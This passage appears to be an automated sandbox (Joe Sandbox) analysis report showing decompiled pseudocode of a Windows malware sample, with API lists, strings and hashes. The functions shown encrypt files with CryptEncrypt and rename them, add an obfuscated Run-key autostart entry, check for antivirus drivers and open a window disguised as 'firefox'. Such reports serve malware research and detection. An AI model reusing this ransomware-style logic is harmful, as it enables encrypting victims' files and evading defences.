						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

APIs

Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

Part of subcall function 00403A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403C4D
wsprintfW.USER32 ref: 00403D17
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00403D2B
GetForegroundWindow.USER32 ref: 00403D40
ShellExecuteExW.SHELL32(00000000), ref: 00403DA1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403DB4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403DC6
CloseHandle.KERNEL32(?), ref: 00403DCF
ExitProcess.KERNEL32 ref: 00403DD7

Strings

", xrefs: 00403CB4
s, xrefs: 00403C79
i, xrefs: 00403BE4
a, xrefs: 00403CA1
%, xrefs: 00403D01
s, xrefs: 00403D65
c, xrefs: 00403C81
r, xrefs: 00403BF5
o, xrefs: 00403C68
l, xrefs: 00403C89
y, xrefs: 00403C05
e, xrefs: 00403C2D
2, xrefs: 00403C1D
c, xrefs: 00403CD5
r, xrefs: 00403D55
m, xrefs: 00403CBF
%, xrefs: 00403BD7
w, xrefs: 00403C25
e, xrefs: 00403CA9
, xrefs: 00403CCA
a, xrefs: 00403CEB
t, xrefs: 00403C0D
\, xrefs: 00403C35
\, xrefs: 00403BFD
e, xrefs: 00403C71
n, xrefs: 00403D5D
, xrefs: 00403C91
r, xrefs: 00403C99
s, xrefs: 00403CE0
c, xrefs: 00403C45
", xrefs: 00403D0C
d, xrefs: 00403BED
p, xrefs: 00403C58
m, xrefs: 00403C15
t, xrefs: 00403CF6

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
Instruction ID: cc7589b939d66cedc96280ec9e713ba096b07f437b5f45324ccf50025119f88d
Opcode Fuzzy Hash: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
Instruction Fuzzy Hash: FF515CB0108341DFE3208F11C94878BBFF9BF84749F00492DE5989A292D7FA9558CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402960 Relevance: 63.1, APIs: 5, Strings: 31, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00402960(char* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				int _t47;
				char* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E00407C60( &_v32, lstrlenW( &_v32));
				_v140 = 0x4f0053;
				_t10 =  &_v8; // 0x402c45
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0, _t10, 0) != 0) {
					return 0;
				} else {
					_t47 = lstrlenW(_t58);
					_t37 =  &_v8; // 0x402c45
					RegSetValueExW( *_t37,  &_v32, 0, 1, _t58, _t47 + _t47);
					asm("sbb esi, esi");
					RegCloseKey(_v8);
					_t39 =  &(_t58[1]); // 0x1
					return _t39;
				}
			}

0x0040296b
0x0040296d
0x00402979
0x00402980
0x00402984
0x0040298c
0x00402993
0x0040299a
0x004029a8
0x004029b0
0x004029ba
0x004029bd
0x004029c7
0x004029ce
0x004029eb
0x004029f8
0x004029ff
0x00402a06
0x00402a0d
0x00402a14
0x00402a1b
0x00402a22
0x00402a29
0x00402a30
0x00402a37
0x00402a3e
0x00402a45
0x00402a4c
0x00402a53
0x00402a5a
0x00402a61
0x00402a68
0x00402a6f
0x00402a76
0x00402a7d
0x00402a8c
0x00402ac7
0x00402a8e
0x00402a8f
0x00402aa1
0x00402aa4
0x00402aaf
0x00402ab1
0x00402ab7
0x00402abf
0x00402abf

APIs

lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0040299D

Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73

RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,E,@,00000000), ref: 00402A84
lstrlenW.KERNEL32(00000000), ref: 00402A8F
RegSetValueExW.ADVAPI32(E,@,00520050,00000000,00000001,00000000,00000000), ref: 00402AA4
RegCloseKey.ADVAPI32(?), ref: 00402AB1

Strings

r, xrefs: 00402A53
n, xrefs: 00402A76
P, xrefs: 0040296D
V, xrefs: 00402A4C
S, xrefs: 004029B0
F, xrefs: 004029BD
I, xrefs: 00402979
\, xrefs: 004029EB
W, xrefs: 004029C7
R, xrefs: 004029CE
\, xrefs: 00402A30
r, xrefs: 00402A3E
n, xrefs: 00402A61
A, xrefs: 0040298C
u, xrefs: 00402A37
U, xrefs: 00402984
E,@, xrefs: 004029BA, 00402AA1, 004029D7
s, xrefs: 00402A06
i, xrefs: 004029F8
\, xrefs: 00402A14
r, xrefs: 004029FF
e, xrefs: 00402A7D
w, xrefs: 00402A29
n, xrefs: 00402A45
f, xrefs: 00402A0D
n, xrefs: 00402A6F
i, xrefs: 00402A1B
H, xrefs: 00402993
R, xrefs: 00402A68
d, xrefs: 00402A22
i, xrefs: 00402A5A

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$E,@$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-1908525871
Opcode ID: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
Instruction ID: 6d84f0b14520ef3984e43a4999751383e09c14a2564039d175e156e7e031e40b
Opcode Fuzzy Hash: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
Instruction Fuzzy Hash: A431DBB090021CDFEB20CF91E949BEDBFB5FB01709F108119D5187A292D7BA4948CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004035E0 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 300
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004035E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				void* _v28;
				WCHAR* _v32;
				void* _v36;
				long _v40;
				void* _v44;
				void* _v48;
				WCHAR* _v52;
				void* _v56;
				void* _v60;
				signed int _v64;
				void _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				long _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t100;
				void* _t106;
				long _t121;
				long _t122;
				void* _t123;
				long _t125;
				WCHAR* _t139;
				void* _t142;
				void* _t145;
				void* _t147;
				WCHAR* _t158;
				WCHAR* _t160;
				void* _t161;
				void* _t162;
				void _t164;
				long _t165;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t139 = __ecx;
				_t162 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v40 = 0;
				_t147 = _t162;
				E00405EA0(_t147, 0, 0,  &_v20,  &_v40);
				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v32 = _t158;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t158, _t139);
				lstrcatW(_t158,  &_v80);
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t147);
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x64], xmm0");
				E00407DB0( &_v104, 0x10);
				E00407DB0( &_v140, 0x20);
				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v44 = _t92;
				asm("movdqu [ebx+0x10], xmm0");
				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t159 = _t93;
				_v48 = _t93;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t95 = E00406000(_v20, _v40, _t92,  &_v88, 0x800);
				_t169 = _t167 + 0x18;
				if(_t95 == 0) {
					L22:
					_t160 = _v32;
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x40], xmm0");
					_t164 = _v68;
					_v8 = _v64;
					L23:
					VirtualFree(_t160, 0, 0x8000);
					return _t164;
				}
				_t100 = E00406000(_v20, _v40, _t159,  &_v84, 0x800);
				_t170 = _t169 + 0x14;
				if(_t100 != 0) {
					E00407EE0( &_v140,  &_v388);
					_t171 = _t170 + 8;
					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
					_v36 = _t142;
					if(_t142 == 0xffffffff) {
						goto L22;
					}
					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
					 *_t161 = 0;
					 *(_t161 + 4) = 0;
					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
					_t165 = 0;
					_v28 = _t106;
					_v24 = 0;
					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
						_t121 = _v12;
						if(_t121 == 0) {
							break;
						}
						_t145 = 0;
						_v60 = 0;
						_t165 =  <  ? 1 : _t165;
						 *_t161 =  *_t161 + _t121;
						asm("adc [edi+0x4], ebx");
						_t122 = _v12;
						_v8 = _t122;
						if((_t122 & 0x0000000f) == 0) {
							L12:
							_t123 = VirtualAlloc(0, _t122, 0x3000, 4);
							_t42 =  &_v8; // 0x406438
							_v56 = _t123;
							E004084E0(_t123, _v28,  *_t42);
							_t125 = _v12;
							_t171 = _t171 + 0xc;
							_v64 = _t125;
							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
								E00403500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
								_t145 = _v60;
								_t171 = _t171 + 0x10;
							}
							VirtualFree(_v56, 0, 0x8000);
							SetFilePointer(_v36,  ~_v8, 0, 1);
							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
								_t165 = 1;
								_v24 = 1;
							}
							VirtualFree(_t145, 0, 0x8000);
							_t142 = _v36;
							if(_t165 == 0) {
								_t106 = _v28;
								continue;
							} else {
								break;
							}
						}
						do {
							_t122 = _t122 + 1;
						} while ((_t122 & 0x0000000f) != 0);
						_v12 = _t122;
						goto L12;
					}
					VirtualFree(_v28, 0, 0x8000);
					if(_v24 == 0) {
						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
					}
					CloseHandle(_t142);
					_t164 =  *_t161;
					_v8 =  *(_t161 + 4);
					VirtualFree(_t161, 0, 0x8000);
					VirtualFree(_v44, 0, 0x8000);
					VirtualFree(_v48, 0, 0x8000);
					_t160 = _v32;
					if(_v24 == 0) {
						MoveFileW(_v52, _t160);
					}
					goto L23;
				}
				GetLastError();
				goto L22;
			}

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 004035F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004035FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0040363A
lstrcpyW.KERNEL32 ref: 00403658
lstrcatW.KERNEL32(00000000,0047002E), ref: 00403663

Part of subcall function 00407DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
Part of subcall function 00407DB0: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
Part of subcall function 00407DB0: GetModuleHandleA.KERNEL32(?), ref: 00407E4D
Part of subcall function 00407DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
Part of subcall function 00407DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C

Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036F1

Part of subcall function 00406000: EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403998

Part of subcall function 00406000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
Part of subcall function 00406000: CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
Part of subcall function 00406000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
Part of subcall function 00406000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
Part of subcall function 00406000: LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103

GetLastError.KERNEL32 ref: 00403751
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00403787
VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 004037A6
VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 004037C5
ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 004037E1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00403832
_memmove.LIBCMT ref: 00403842
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040385A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040388F

Strings

., xrefs: 0040363E
, xrefs: 0040370A
B, xrefs: 00403651
8d@, xrefs: 0040399A, 00403838
D, xrefs: 0040364A

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
String ID: $.$8d@$B$D
API String ID: 837238375-279925716
Opcode ID: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
Instruction ID: e6440529c24e0b0f2c5be8c2954fde7d882e22268c9ef2e78ee628bee86a44a3
Opcode Fuzzy Hash: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
Instruction Fuzzy Hash: 28B15DB1E40309BBEB119F94CD45FEEBBB8AB48700F204125F644BA2D1DBB45E448B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				short _t42;
				void* _t49;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				if(E00402F50( &(_v84.message)) != 0 || E00402F50( &_v96) != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E00402C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E00402D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
							}
							goto L15;
						}
						ExitThread(_t71);
					}
					ExitThread();
				} else {
					_v84.message = 0x730066;
					_v84.wParam = 0x660064;
					_v84.lParam = 0x2e0077;
					_v84.time = 0x790073;
					_v84.pt = 0x73;
					if(E00402F50( &(_v84.message)) != 0) {
						L15:
						ExitThread(0);
					}
					_t61 = E004030A0(_t62, _t67, _t69);
					if(_t61 != 0) {
						goto L15;
					}
					_push(_t61);
					E00402AD0();
					goto L5;
				}
			}

APIs

Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402E19
LoadCursorW.USER32(00000000,00007F00), ref: 00402E2E
LoadIconW.USER32 ref: 00402E59
RegisterClassExW.USER32 ref: 00402E68
ExitThread.KERNEL32 ref: 00402E75

Part of subcall function 00402F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00402E81
CreateWindowExW.USER32 ref: 00402EA7
SetWindowLongW.USER32 ref: 00402EB4
ExitThread.KERNEL32 ref: 00402EBF

Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 00402FA8
Part of subcall function 00402F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 00402FCF
Part of subcall function 00402F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00402FE3
Part of subcall function 00402F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402FFA

ExitThread.KERNEL32 ref: 00402F3F

Part of subcall function 00402AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
Part of subcall function 00402AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
Part of subcall function 00402AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
Part of subcall function 00402AD0: ExitThread.KERNEL32 ref: 00402C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00402EC8
UpdateWindow.USER32(00000000), ref: 00402ECF
CreateThread.KERNEL32 ref: 00402EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F05
TranslateMessage.USER32(?), ref: 00402F1C
DispatchMessageW.USER32 ref: 00402F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F37

Strings

s, xrefs: 00402D7F
0, xrefs: 00402DF1
s, xrefs: 00402DB9
d, xrefs: 00402DA9
firefox, xrefs: 00402E9B
s, xrefs: 00402D77
s, xrefs: 00402DC1
w, xrefs: 00402DB1
1, xrefs: 00402D6F
k, xrefs: 00402D67
f, xrefs: 00402DA1
win32app, xrefs: 00402E51, 00402EA0

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
Instruction ID: 6dadb659047271fd80ce1d130f626f3db599e38ffd86fa9de69c1f1ec4dcf306
Opcode Fuzzy Hash: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
Instruction Fuzzy Hash: 0F515070248302AFF7109F618D0DB5B7AE4AF44748F10092DF684BA2D1D7F99945CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004040A0 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 167
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E004040A0(void* __ecx) {
				char _v148;
				char _v152;
				void* _v156;
				short _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				char _v232;
				WCHAR* _v236;
				WCHAR* _v240;
				void* _t44;
				void* _t48;
				void* _t50;
				signed int _t51;
				void* _t52;
				WCHAR* _t56;
				signed short _t60;
				signed short* _t61;
				WCHAR* _t68;
				signed int _t73;
				signed int _t74;
				void* _t77;
				void* _t80;
				long _t83;
				WCHAR* _t84;
				signed int _t87;
				void* _t88;
				WCHAR* _t90;
				void* _t92;
				WCHAR* _t113;

				if( *0x412b04 != 0) {
					L25:
					return _t44;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E004039B0( &_v148);
				E00406D90( &_v236);
				_t87 = E00406BA0( &_v236);
				_t83 = 0x42 + _t87 * 2;
				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40);
				_v240 = _t48;
